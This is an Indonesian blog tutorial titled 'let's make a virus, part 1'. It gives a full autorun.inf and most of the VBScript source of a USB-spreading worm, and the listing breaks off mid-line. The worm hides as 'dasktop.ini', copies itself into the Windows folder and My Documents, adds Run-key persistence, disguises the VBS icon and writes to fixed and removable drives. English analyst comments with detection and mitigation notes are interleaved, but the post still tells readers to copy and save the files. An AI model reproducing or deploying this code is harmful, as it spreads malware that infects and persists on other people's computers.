
04/10/09

Mari membuat virus part 1

Sama seperti pembahasan sebelumnya mari kita buat virus kembali, dari script virus cabulxx. Yang sedikit modifikasi.. Tahap pertama membuat virus adalah kita harus memiliki autorun.. Nah dibawah ini script autorunnya,

script begin
----------------------

; Analyst notes: an autorun.inf placed in the root of a drive. Every command
; entry below starts wscript.exe on a file named dasktop.ini, a one-letter
; variation of the legitimate desktop.ini.
; Detection: an autorun.inf whose shellexecute/shell\...\command entries invoke
; wscript.exe with //e: on a file that has no script extension.
; Mitigation: keep AutoRun disabled for removable and fixed drives (the
; NoDriveTypeAutoRun policy); current Windows releases no longer honour these
; command entries on USB storage by default.
[autorun]
; Command run when AutoRun fires for the drive. //e:VBScript forces the VBScript
; engine even though the target file ends in .ini; "auto" is passed to the script
; as an argument (the script portion shown on this page never reads it).
shellexecute=wscript.exe //e:VBScript dasktop.ini auto
; Caption shown for this entry in the AutoPlay dialog, worded to look like the
; normal "open folder" choice.
action=Open folder to view file
; Replaces the drive's "open" verb with the same wscript.exe command line, so
; opening the drive from Explorer would start the script as well.
shell\open\command=wscript.exe //e:VBScript dasktop.ini auto
; Icon for the drive / AutoPlay entry, taken from a system DLL resource
; (presumably a folder icon, to reinforce the disguise; not verifiable here).
icon=%systemroot%\shell32.dll,4

File ini berfungsi sebagai autorun; file yang dijalankannya menyamar sebagai file asli Windows desktop.ini dengan nama dasktop.ini. Copy paste file di atas, save as all files, simpan sebagai autorun.inf.

Nah, di bawah ini script desktop.ini palsu (dasktop.ini):

script begin
----------------------

' Analyst notes: set-up section of the script. It loads its own source text into
' memory; the code that follows on this page writes that text to several other
' file paths, which is the self-copy step.
' Detection: a wscript.exe process that opens its own script file for reading and
' then creates new script files through Scripting.FileSystemObject.

' Suppress all runtime errors so a failed step does not stop the script or show a
' script-host error dialog.
on error resume next
set fs=createobject("scripting.filesystemobject")
' File object for the script that is currently running.
set b3b15cR17T=fs.getfile(wscript.scriptfullname)

' Text of an autorun.inf, identical to the listing shown earlier on the page. It is
' not used in the visible part of the script; presumably it is written next to the
' copy placed on each drive (the listing is cut off before that point).
b3b15cR17Trn="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"action=Open folder to view file"&vbcrlf&"shell\open\command=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"icon=%systemroot%\shell32.dll,4"

' Open the running script as a text stream: 1 = ForReading, -2 = TristateUseDefault.
set b3b15cR17Ttx=b3b15cR17T.openastextstream(1,-2)


' Read the script line by line into b3b15cR17Tv, re-adding a CRLF after each line,
' so the variable ends up holding the script's full source.
do while not b3b15cR17Ttx.atendofstream
b3b15cR17Tv=b3b15cR17Tv&b3b15cR17Ttx.readline
b3b15cR17Tv=b3b15cR17Tv&vbcrlf
loop

do

set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=32

set my63615cR1p7=fs.createtextfile(b3b15cR17Th &"\myName.bat")
my63615cR1p7.writeline "@echo off"
my63615cR1p7.writeline "echo ######### ## ## ## ##### ### ########### ########"
my63615cR1p7.writeline "echo ############ ## ### #### ####### #### ######## ##########"
my63615cR1p7.writeline "echo ## ### ## ## ##### #### # ##"
my63615cR1p7.writeline "echo ## ## ## ## ###### #### # ##"
my63615cR1p7.writeline "echo ### ### ## ## ## ###### #### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ## ## ### ####"
my63615cR1p7.writeline "echo ## ## ######### #### ## ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ####### # ##"
my63615cR1p7.writeline "echo ### ### ## ###### ## #### ### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## # ####"
my63615cR1p7.writeline "echo ############ ########## #### #### ####"
my63615cR1p7.writeline "echo ######### ####### ### ########"
my63615cR1p7.writeline "maafkan aku mencintaimu [verion: 21-09-2009]"
my63615cR1p7.writeline "pause"
my63615cR1p7.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=39
set DB5cR1p7x93nT=createobject("WScript.Shell")
docf=DB5cR1p7x93nT.specialfolders("MyDocuments")
sCr1p7x93nT3v1L=docf & "\dian sastrowardoyo"
if not fs.folderexists(sCr1p7x93nT3v1L) then
set crfolder=fs.createfolder(sCr1p7x93nT3v1L)
end if

set b3b15cR17Tfn=fs.createtextfile(sCr1p7x93nT3v1L & "\midori.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close


set DB5cR1p7x93nT = createobject("WScript.Shell")
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winsoc","c:\Windows\winsoc.vbs","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\xGentn4m3","c:\Windows\myName.bat","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","C:\Program Files\Windows Media Player\wmplayer.exe,1","REG_SZ"

almreg = "HKCU\Software\Policies\Microsoft\Windows\System\"
DB5cR1p7x93nT.RegWrite almreg & "DisableCMD","0", "REG_DWORD"

almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableTaskMgr","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableMsConfig","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableRegistryToo0s","0","REG_DWORD"

DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\Hidden","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\HideFileExt","0","REG_DWORD"
DB5cR1p7x93nT.Regwrite almreg & "Explorer\Advanced\ShowSuperHidden","0x00000001"

almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"
DB5cR1p7x93nT.RegWrite almreg & "NoRun", "0", "REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "NoFolderOptions", "0", "REG_DWORD"

set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")

b3b15cR17Tfn.attributes=32

set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Th &"\winsoc.vbs")

b3b15cR17Tfn.write b3b15cR17Tv

b3b15cR17Tfn.close



set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")

b3b15cR17Tfn.attributes=39

set b3b15cR17Twsl=createobject("wscript.shell")

b3b15cR17Tdc=b3b15cR17Twsl.specialfolders("MyDocuments")

set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Tdc &"\diansastro.vbs")

b3b15cR17Tfn.write b3b15cR17Tv

b3b15cR17Tfn.close



for each b3b15cR17Tdrive in fs.drives

if (b3b15cR17Tdrive.drivetype=1 or b3b15cR17Tdrive.drivetype=2) and b3b15cR17Tdrive.path<>"A:" then

set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive.path &"\dasktop.ini")

b3b15cR17Tfn.attributes=32

set b3b15cR17Tfn=fs.cre
